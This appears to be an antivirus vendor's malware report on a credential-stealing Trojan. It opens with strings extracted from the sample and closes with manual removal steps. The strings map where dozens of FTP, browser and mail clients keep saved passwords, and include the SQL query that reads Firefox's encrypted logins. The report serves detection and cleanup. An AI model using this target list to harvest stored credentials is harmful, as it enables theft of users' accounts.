Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

\SmartFTP

Favorites.dat

History.dat

addrbk.dat

quick.dat

\TurboFTP

Software\TurboFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

profiles.xml

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

PasswordType

Login

FtpSite.xml

\sites.xml

\FTPRush

RushSite.xml

FtpPort

Software\Cryer\WebSitePublisher

bitkinex.ds

\drives.js

"password" : "

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

FtpServer

FtpUserName

FtpPassword

_FtpPassword

FtpDirectory

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

ftplast.osd

\SharedSettings.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings.sqlite

\SharedSettings_1_0_5.sqlite

leapftp

unleap.exe

sites.dat

sites.ini

\LeapWare\LeapFTP

PortNumber

\32BitFtp.ini

NDSites.ini

PassWord

Software\South River Technologies\WebDrive\Connections

FTP CONTROL

FTPCON

hXXp://

hXXps://

PTF://

opera

wand.dat

_Software\Opera Software

Opera.HTML\shell\open\command

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

wiseftpsrvs.ini

wisePTF.ini

FTPVoyager.ftp

FTPVoyager.qc

\RhinoSoft.com

nss3.dll

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3_open

sqlite3_close

sqlite3_prepare

sqlite3_step

sqlite3_column_bytes

sqlite3_column_blob

mozsqlite3.dll

profiles.ini

PathToExe

prefs.js

signons.sqlite

signons.txt

signons2.txt

signons3.txt

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

Firefox

\Mozilla\Firefox\

Software\Mozilla

fireFTPsites.dat

SeaMonkey

\Mozilla\SeaMonkey\

Mozilla

\Mozilla\Profiles\

Software\LeechFTP

bookmark.dat

SiteInfo.QFP

WinFTP

sites.db

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

servers.xml

\FTPGetter

ESTdb2.dat

QData.dat

\Estsoft\ALFTP

MS IE FTP Passwords

SiteServer %d\Host

SiteServer %d\WebUrl

SiteServer %d\Remote Directory

SiteServer %d-User

SiteServer %d-User PW

%s\Keychain

SiteServer %d\SFTP

DeluxeFTP

sites.xml

Web Data

Login Data

SQLite format 3

logins

origin_url

password_value

\Google\Chrome

\ChromePlus

Software\ChromePlus

\Nichrome

Staff-FTP

SM.arch

FreshFTP

BlazeFtp

site.dat

LastPassword

LastPort

Software\FlashPeak\BlazeFtp\Settings

\BlazeFtp

FTP  .Link\shell\open\command

GoFTP

Connections.txt

3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

password 51:b:

FTP Now

FTPNow

SOFTWARE\Robo-FTP 3.7\Scripts

SOFTWARE\Robo-FTP 3.7\FTPServers

FTP Count

FTP File%d

2.5.29.37

Software\LinasFTP\Site Manager

.duck

user.config

NppFTP.xml

FTP destination server

FTP destination user

FTP destination password

FTP destination port

FTP destination catalog

FTP profiles

FTPShell

ftpshell.fsi

Software\MAS-Soft\FTPInfo\Setup

\FTPInfo

ServerList.xml

ftpsite.ini

FTPList.db

\MapleStudio\ChromePlus

Software\Nico Mak Computing\WinZip\FTP

My FTP

project.ini

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

NovaFTP.db

\INSoftware\NovaFTP

.oeaccount

<POP3_Password2

<SMTP_Password2

<IMAP_Password2

<HTTPMail_Password2

\Microsoft\Windows Live Mail

Software\Microsoft\Windows Live Mail

\Microsoft\Windows Mail

Software\Microsoft\Windows Mail

Mailbox.ini

\PocoSystem.ini

accounts.ini

PopPort

PopPassword

SmtpServer

SmtpPort

SmtpAccount

SmtpPassword

account.cfg

account.cfn

Dir #%d

SMTP Email Address

SMTP Server

SMTP User Name

HTTP User

HTTP Server URL

HTTPMail User Name

HTTPMail Server

SMTP User

POP3 Port

SMTP Port

IMAP Port

POP3 Password2

IMAP Password2

NNTP Password2

HTTPMail Password2

SMTP Password2

POP3 Password

IMAP Password

NNTP Password

HTTP Password

SMTP Password

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

inetcomm server passwords

outlook account manager passwords

STATUS-IMPORT-OK

%d.bat

ShellExecuteA

shell32.dll

;3 #>6.&

'2, / 0&7!4-)1#

GetWindowsDirectoryA

user32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyA

RegEnumKeyExA

RegCreateKeyA

InternetCrackUrlA

InternetCreateUrlA

wininet.dll

shlwapi.dll

wsock32.dll

userenv.dll

2hXXp://VVV.facebook.com/

xthpt/:w/wwf.cabeoo.koc/m

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   RegSvr32.exe:744
   p.exe:2008
   mscorsvw.exe:172
   regsvr32.exe:1024
   ie.exe:1472

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\gbclass.dll (7386 bytes)
   %Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)
   %Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (712 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (950 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)
   %Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
   %Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
   %Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
   %Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
   %WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
   %WinDir%\IE9_main.log (3233 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
   %WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "internet" = "explorer C:\"
   
   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.